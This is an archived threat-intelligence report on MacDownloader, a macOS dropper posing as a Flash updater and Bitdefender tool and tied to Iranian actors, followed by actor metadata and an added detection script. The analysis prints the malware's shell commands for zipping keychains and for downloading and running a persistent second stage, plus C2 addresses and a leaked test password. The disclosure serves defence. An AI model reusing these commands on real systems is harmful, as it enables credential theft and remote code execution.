{
	"id": "9412e97f-e3c5-4c50-8d77-30e0711f9ada",
	"created_at": "2026-04-06T00:12:02.411381Z",
	"updated_at": "2026-04-10T03:37:55.898597Z",
	"deleted_at": null,
	"sha1_hash": "6c86760d61e13ea7829a18361d480bd791c11841",
	"title": "iKittens: Iranian Actor Resurfaces with Malware for Mac (MacDownloader)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2169137,
	"plain_text": "iKittens: Iranian Actor Resurfaces with Malware for Mac (MacDownloader)\r\nArchived: 2026-04-05 15:57:42 UTC\r\nPublic Notice (6 February 2017)\r\nSummary\r\nA macOS malware agent, named MacDownloader, was observed in the wild targeting the defense industrial base, and reported elsewhere to have been used against a human rights advocate. MacDownloader strangely attempts to pose as both an installer for Adobe Flash and the Bitdefender Adware Removal Tool, in order to extract system information and copies of OS X keychain databases. Based on observations of the infrastructure and the state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such as persistence do not appear to work. Instead, MacDownloader is a simple exfiltration agent with broader ambitions.\r\nThe macOS malware also mirrors the approach of the ExtremeDownloader dropper previously documented in our research, and samples of the latter identified during this time used the same infrastructure. Lastly, the exposure of test victim data and code references provides a unique insight into the development of the malware, with potential connections to agents developed by long dormant threat groups.\r\nSince the Technical Preview of our forthcoming Carnegie Endowment publication about state-sponsored espionage campaigns was released at Black Hat USA, we have continued to disclose information about current Iranian activities in order to promote public education and to provide indicators of compromise. 
While this agent is neither sophisticated nor full-featured, its sudden appearance is concerning given the popularity of Apple computers within certain communities, and inaccurate perceptions about the security of those devices.\r\nBackground\r\nSince the start of the Iran Threats posts, we have documented an ever-changing array of malware agents targeting Windows and Android devices in order to exfiltrate files and record keystrokes from victims. While Windows remains the dominant operating system in the world, many communities have shifted over to macOS in the interest of security and stability. However, much of the added security afforded to macOS users stems from attackers' expectation of Windows targets and the smaller supply of readily available remote access tools for the OS, rather than from better built-in defenses. Thus, macOS users are at risk of assuming greater protection against malware than actually exists, and could be more vulnerable as a result. One of these communities is the human rights community, especially those focused on Iran, which based on anecdotal experience is strongly dependent on Apple devices.\r\nIncident and Impact\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 1 of 9\r\nAn active staging of the MacDownloader agent was first observed linked from a site impersonating the aerospace firm \"United Technologies Corporation,\" a spearphishing site previously believed to be maintained by Iranian actors for spreading Windows malware. The page claimed to offer \"Special Programs And Courses,\" specifically mentioning employees and interns of Lockheed Martin, Sierra Nevada Corporation, Raytheon and Boeing. The citation of the aforementioned companies also aligned with known targeting of spearphishing campaigns by the same group. The host used to stage the malware had also previously been used to deploy the BeEF framework on subdomains that appeared as a dental office and a U.S. 
Air Force basic training page.\r\nCounterintuitively, the bait to download the agent features a French-language warning in the place of a video player that informs the visitor that the \"plugin has security flaws,\" with a link to activate Adobe Flash. MacDownloader is the first spearphishing attempt we have observed that honestly informs its target about its malicious nature. The target is provided either Windows or Mac malware based on the detected operating system, with Windows clients provided a dropper written in Go. The packaging of the MacDownloader sample also provides further indication of its Iranian origin through its name, \"addone flashplayer.app,\" which, on the basis of its grammar, suggests that a Persian-language speaker named the file. The continuity of certain infrastructure and trends in targeting suggest a relationship to the Charming Kitten actor group, believed to be based in Iran and connected to Iranian security entities.\r\nMacDownloader\r\nThe malware utilized in these attacks is a macOS-specific dropper (a 64-bit Mach-O binary) named MacDownloader, based on strings from the development environment that are embedded in the binary. MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. 
The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager, which mirrors the focus of Windows malware developed by the same actors.\r\nAt the time of writing, MacDownloader appears completely undetected by virus scanning engines on VirusTotal, which suggests that consumer antivirus software may have difficulty detecting the agent.\r\nWith this particular build of MacDownloader, a fake Adobe Flash Player dialog is displayed upon execution, prompting the victim to click on an \"Update Flash-Player\" button. Interestingly, clicking on the \"Close\" button does in fact make the application exit. After the victim clicks on the Update button, the following fake dialog is displayed, announcing that adware was discovered on the computer and that the application was in the process of cleaning it up.\r\nThis dialog is a bit surprising and confusing, particularly considering that the pretense of this build of MacDownloader is to be a Flash Player update, not antivirus software. This incongruity was soon explained when we noticed that in the resources of the malicious application there was a NIB file (which is a stored user interface design for Mac applications) that seems not to have been used in this particular build. These dialogues are also rife with basic typos and grammatical errors, indicating that the developer paid little attention to quality control. 
We believe MacDownloader was originally designed as a fake virus removal tool and, in order to fit a particular social engineering attempt, was later repackaged as a fake Flash Player update.\r\nThe malware reads from the embedded Resources folder the file \"checkadr.txt,\" which contains the URL for the first beacon:\r\nhttp://46.17.97[.]37/Servermac.php\r\nThe C2 used in this sample was taken down by a third party two weeks ago. Another resource, \"eula-help.txt,\" appears to provide an internal development server address, and reflects the developer’s expectation of MacDownloader as simply a dropper.\r\nhttp://192.168.3.217/DroperTest\r\nAdditionally, a file \"appId.txt\" provides what appears to be a unique identifier for the campaign tied to the agent. This identifier is communicated to the C2 when exfiltrating data from the host. In the sample examined, and in the testing observed, this is set as ‘snc’, an identifier that would align with victims of concurrent spearphishing campaigns by the same group.\r\nIt appears that the application contains an unused attempt to install persistent access to the victim host. One segment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by writing an entry in the /etc/rc.common file. In theory, every time the infected computer started up, the shell script would be launched to download a file from a remote location, check whether it changed from the previous iteration, and if so execute that new implant. As written, though, the check is inverted: cmp exits zero only when the two hash files are identical, so the downloaded file would be executed when its hash had not changed, and the new hash is copied to /etc/oldf_md5.md5 while the comparison reads /etc/old_md5.md5, so the stored value is never updated. While we haven’t managed to obtain a proper response from the server before it was taken offline, our initial investigation did not find a subsequent implant. In the course of testing, it did not appear that this code was executed, and instead calls to the remote server were made through Apple’s Core Services framework instead. 
Moreover, GET requests without parameters against the endpoint were observed to trigger PHP errors, rather than provide an implant. Therefore, we did not find immediate indication that MacDownloader was persistent, only that the developers intended to include remote updates and persistence as a feature.\r\ndo shell script \"uname -a \u003e /etc/checkdrive.chk\"\r\nzip -rj /etc/kcbackup.cfg /Library/Keychains/\r\necho \"#!/bin/bash\r\ncurl -o /tmp/mastering-vim.pdf %@\r\nmd5 /tmp/mastering-vim.pdf | grep vim | cut -d- -f 2 \u003e /etc/newf_md5.md5\r\nif cmp /etc/newf_md5.md5 /etc/old_md5.md5\r\nthen\r\n #echo equal\r\n cp /etc/newf_md5.md5 /etc/oldf_md5.md5\r\n chmod +x /tmp/mastering-vim.pdf\r\n /tmp/mastering-vim.pdf\r\nfi\r\n\" \u003e /etc/.checkdev \u0026\u0026 if cat /etc/rc.common | grep .checkdev; then sleep 1; else echo \"sleep %d \u0026\u0026 /e\r\nIn parallel, MacDownloader harvests information on the infected system, including the user’s active Keychains, which are then uploaded to the C2. The dropper also documents the running processes, installed applications, and the username and password, which are acquired through a fake System Preferences dialog. Armed with the user’s credentials, the attackers would then be able to access the encrypted passwords stored within the Keychain database. While Chrome and Firefox do not store credentials in Keychain, Safari and macOS’s system services do save passwords to sites, remote file systems, encrypted drives, and other critical resources there. The primary focus on retrieving stored passwords and recording keystrokes to capture passwords for online services is a common trend with custom Iranian malware. Using these passwords, the actors then access accounts to take permanent backups of victims’ emails, cloud files, and social networking activities. 
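\r\nThe following triage script is an added example and is not code from the report or from the malware author. It checks a filesystem for the artifact paths the dropper writes, parses the /tmp/applist.txt profile in the layout the report reproduces below, and reads the bundle identifier, copyright string and Resources text files of the .app bundle that the Origin and Development section discusses. The host tree and bundle it builds are constructed for demonstration only; the hostnames, addresses and credentials in them are placeholders.

```python
# Added example, not code from the report or the malware author: triage of the
# MacDownloader indicators the analysis describes. build_sample() is constructed.
import json
import os
import plistlib
import tempfile

# Host files the dropper writes, per the report (uname output, keychain zip,
# updater script, hash files, harvested profile, second-stage download target).
HOST_ARTIFACTS = [
    'etc/checkdrive.chk', 'etc/kcbackup.cfg', 'etc/.checkdev',
    'etc/newf_md5.md5', 'etc/oldf_md5.md5', 'etc/old_md5.md5',
    'tmp/applist.txt', 'tmp/mastering-vim.pdf',
]
BUNDLE_ID = 'zenderod.Bitdefender-Adware-Removal-Tool'

def parse_applist(text):
    # applist.txt is a JSON array: labelled strings at the top level, nested
    # arrays for the /Applications listing and the process list.
    out = {'fields': {}, 'apps': [], 'processes': []}
    def walk(node):
        for item in node:
            if isinstance(item, list):
                walk(item)
            elif item.startswith('process name is:'):
                out['processes'].append(item)
            elif item.endswith('.app'):
                out['apps'].append(item)
            elif ':' in item:
                key, value = item.split(':', 1)
                out['fields'][key.strip()] = value.strip().strip('\"')
    walk(json.loads(text))
    return out

def inspect_bundle(app_dir):
    # Static checks: bundle identifier, copyright, Contents/Resources config files.
    contents = os.path.join(app_dir, 'Contents')
    with open(os.path.join(contents, 'Info.plist'), 'rb') as fh:
        info = plistlib.load(fh)
    result = {
        'bundle_id_match': info.get('CFBundleIdentifier') == BUNDLE_ID,
        'copyright': info.get('NSHumanReadableCopyright', ''),
        'resources': {},
    }
    for name in ('checkadr.txt', 'appId.txt', 'eula-help.txt'):
        path = os.path.join(contents, 'Resources', name)
        if os.path.isfile(path):
            with open(path) as fh:
                result['resources'][name] = fh.read().strip()
    return result

def triage_host(root):
    # root is '/' on a live host or the mount point of a disk image.
    found = ['/' + rel for rel in HOST_ARTIFACTS
             if os.path.exists(os.path.join(root, rel))]
    hooked = False
    rc_common = os.path.join(root, 'etc/rc.common')
    if os.path.isfile(rc_common):
        with open(rc_common) as fh:
            hooked = '.checkdev' in fh.read()  # entry appended by the dropper
    applist = None
    applist_path = os.path.join(root, 'tmp/applist.txt')
    if os.path.isfile(applist_path):
        with open(applist_path) as fh:
            applist = parse_applist(fh.read())
    return {'artifacts': found, 'rc_common_hooked': hooked, 'applist': applist}

def build_sample(root):
    # Constructed infected-host tree and bundle; names and values are placeholders.
    def write(rel, data, mode='w'):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, mode) as fh:
            fh.write(data)
    write('etc/.checkdev', '#!/bin/bash\ncurl -o /tmp/mastering-vim.pdf http://c2.invalid/x\n')
    write('etc/rc.common', '# existing content\nsleep 30 && /etc/.checkdev\n')
    write('tmp/applist.txt', json.dumps([
        'OS version:Darwin host.local 16.3.0',
        'Root Username: \"user\"',
        'Root Password: \"hunter2\"',
        ['Safari.app', 'Mail.app'],
        ['process name is: Bitdefender Adware Removal Tool\t PID: 17550'],
    ]))
    app = 'tmp/addone flashplayer.app'
    write(app + '/Contents/Info.plist', plistlib.dumps({
        'CFBundleIdentifier': BUNDLE_ID,
        'NSHumanReadableCopyright': 'Copyright © 2015 Mamedof. All rights reserved.',
    }), 'wb')
    write(app + '/Contents/Resources/checkadr.txt', 'http://c2.invalid/Servermac.php\n')
    write(app + '/Contents/Resources/appId.txt', 'snc\n')
    return os.path.join(root, app)

def demo():
    root = tempfile.mkdtemp()
    app = build_sample(root)
    return {'host': triage_host(root), 'bundle': inspect_bundle(app)}
if __name__ == '__main__':
    print(json.dumps(demo(), indent=2))
```

Run as a script it prints the findings for the constructed sample; on a real host, call triage_host('/') as root and inspect_bundle() on the extracted .app, and treat a populated /tmp/applist.txt as evidence that the credential and keychain collection already ran and was most likely uploaded.\r\n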
Windows agents used by the same group currently behave in the same manner, collecting the saved passwords and browser histories of Firefox and Chrome at the time of infection. One would anticipate this will appear in subsequent versions of MacDownloader.\r\nAll the harvested information is then compiled in a file stored at /tmp/applist.txt, and not removed after submission:\r\n[\r\n \"OS version:[UNAME OUTPUT]\",\r\n \"Root Username: \\\"[USER]\\\"\",\r\n \"Root Password: \\\"[PASSWORD]\\\"\",\r\n \"Keychains loaded in current user \",\r\n \"Local ip address: [IP ADDRESS]\",\r\n \"Ifconfig: [IFCONFIG OUTPUT]\",\r\n [\r\n [CONTENT OF /Applications]\r\n ],\r\n [\r\n ....\r\n \"process name is: Bitdefender Adware Removal Tool\\t PID: 17550 Run from: file:\\/\\/\\/Users\\/user\\\r\n ]\r\n]\r\nOnce the execution completes, MacDownloader smoothly displays a dialog informing the user that the update of Flash Player has completed. Needless to say, no Flash Player was installed or updated whatsoever.\r\nOrigin and Development\r\nWithin the metadata for the application (Info.plist), MacDownloader contains unusual references that may provide insight into its development. The \"Bundle identifier\" property is set to \"zenderod.Bitdefender-Adware-Removal-Tool,\" mirroring the secondary impersonation of Bitdefender by the agent. Under standard software development practices, the first component of the string is set to the name or company of the original developer, which in this case is \"zenderod.\" Zenderod is evidently a reference to the Zayandeh Rood, a famous river that runs through Isfahan, Iran. Curiously, this shorthand transliteration also aligns with the domain of Novin Pardaz Zenderod (zenderod.ir, which now redirects to npzr.ir), a software and hosting company in Isfahan. 
While the site does not note any expertise in macOS software development, the application would not require a sophisticated developer to produce, and it appeared at one point to rely on shell scripts to function, which is within their stated expertise. We contacted an individual listed as the administrative contact for Novin Pardaz Zenderod, and they denied producing macOS software or any association with the malware.\r\nAdditionally, the \"Readable Copyright\" property, which displays the copyright information available in the About dialogue, is set to \"Copyright © 2015 Mamedof. All rights reserved.\" The outdated copyright suggests that the malware’s developer copied the template from another project. We were unable to find another application that contained the name in the copyright, indicating that it could be from a more obscure application or previous work of the developer.\r\nIn the binary, we find a number of strings that indicate the username of the developer of MacDownloader within filesystem paths embedded by Xcode. These strings suggest that the developer’s first name is Shayan, and provide the previously cited project name.\r\n/Users/shayan/Desktop/MacDownloader/MyApp3/\r\n/Users/shayan/Library/Developer/Xcode/DerivedData/Adware_Removal_Tool-frnnuqjzajnllqgzakkslsovdhag/Build/Intermediates/Adware Removal Tool.build/Debug/Adware Removal Tool.build/Objects-normal/x86_64/AppDelegate.o\r\nUniquely, in the course of testing the malware agent, one of the malware operators appears to have infected a MacBook Pro. In doing so, the malware agent uploaded both system information and OS X Keychain databases to the C2 for a user \"Ultrone\" with the password \"saeed\" -- presumably another name. 
While sparse, the uploaded Keychains provide some clues about the social relationships and tactics of the actor through VPN credentials and Wifi network records.\r\nOf particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a defacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber Security Group also, as with many other defacement groups later identified as involved in state-aligned campaigns, purports to provide commercial security services and penetration testing training.\r\nThe \"mb_1986\" wireless name is more interesting, as it provides a connection to earlier Iranian campaigns, overlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014. In earlier samples of a malware agent dubbed \"Sayad,\" multiple resource paths embedded in the malware reference development from a Windows environment running under the username \"mb_1986\" (specifically, c:\\Users\\mb_1986\\Desktop\\Projects\\Tiny_st\\BlackBerry\\obj\\Debug\\MSSUP.pdb). This username is also found within the system logs of an Iranian computer named \"BORHAN\" that was compromised multiple times by the Stealer malware between December 2013 and February 2014. BORHAN had a number of professional software development tools that reflect the administration and development trends of the actors (Subversion, VMware vSphere, and Microsoft Visual Studio). 
The repetitive and short-lived compromises suggest that the host belonged to a developer of the Stealer family, and that they continued to develop the platform beyond Operation Saffron Rose, which evolved into MiniSayad, and then socially interacted with the MacDownloader operators.\r\nIndicators of Compromise\r\nHashes\r\naddone flashplayer.app.zip\r\n52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c\r\nBitdefender Adware Removal Tool\r\n7a9cdb9d608b88bd7afce001cb285c2bb2ae76f5027977e8635aa04bd064ffb7\r\nNetwork\r\nutc.officialswebsites[.]info\r\nContact\r\nClaudio (nex@amnesty.org)\r\nFingerprint: E063 75E6 B9E2 6745 656C 63DE 8F28 F25B AAA3 9B12\r\nCollin (cda@cda.io)\r\nPGP Key: https://cda.io/key.asc\r\nFingerprint: 510E 8BFC A60E 84B4 40EA 0F32 FAFB F2FA\r\nSource: https://iranthreats.github.io/resources/macdownloader-macos-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://iranthreats.github.io/resources/macdownloader-macos-malware/"
	],
	"report_names": [
		"macdownloader-macos-malware"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8e1bae2f-2a21-4ba8-a6f1-42155f96aec8",
			"created_at": "2022-10-25T16:07:23.645758Z",
			"updated_at": "2026-04-10T02:00:04.700158Z",
			"deleted_at": null,
			"main_name": "Flying Kitten",
			"aliases": [
				"Ajax Security Team",
				"Flying Kitten",
				"G0130",
				"Group 26",
				"Operation Saffron Rose"
			],
			"source_name": "ETDA:Flying Kitten",
			"tools": [
				"Stealer"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f4d7cba1-dbdd-42a9-88c5-4d0c81659ee0",
			"created_at": "2023-01-06T13:46:38.357581Z",
			"updated_at": "2026-04-10T02:00:02.941254Z",
			"deleted_at": null,
			"main_name": "Flying Kitten",
			"aliases": [
				"Saffron Rose",
				"AjaxSecurityTeam",
				"Ajax Security Team",
				"Group 26",
				"Sayad",
				"SaffronRose"
			],
			"source_name": "MISPGALAXY:Flying Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8faa11f5-2a14-479c-9ea8-3779e6de9749",
			"created_at": "2022-10-25T15:50:23.814205Z",
			"updated_at": "2026-04-10T02:00:05.308465Z",
			"deleted_at": null,
			"main_name": "Ajax Security Team",
			"aliases": [
				"Ajax Security Team",
				"Operation Woolen-Goldfish",
				"AjaxTM",
				"Rocket Kitten",
				"Flying Kitten",
				"Operation Saffron Rose"
			],
			"source_name": "MITRE:Ajax Security Team",
			"tools": [
				"sqlmap",
				"Havij"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434322,
	"ts_updated_at": 1775792275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.pdf",
		"text": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.txt",
		"img": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.jpg"
	}
}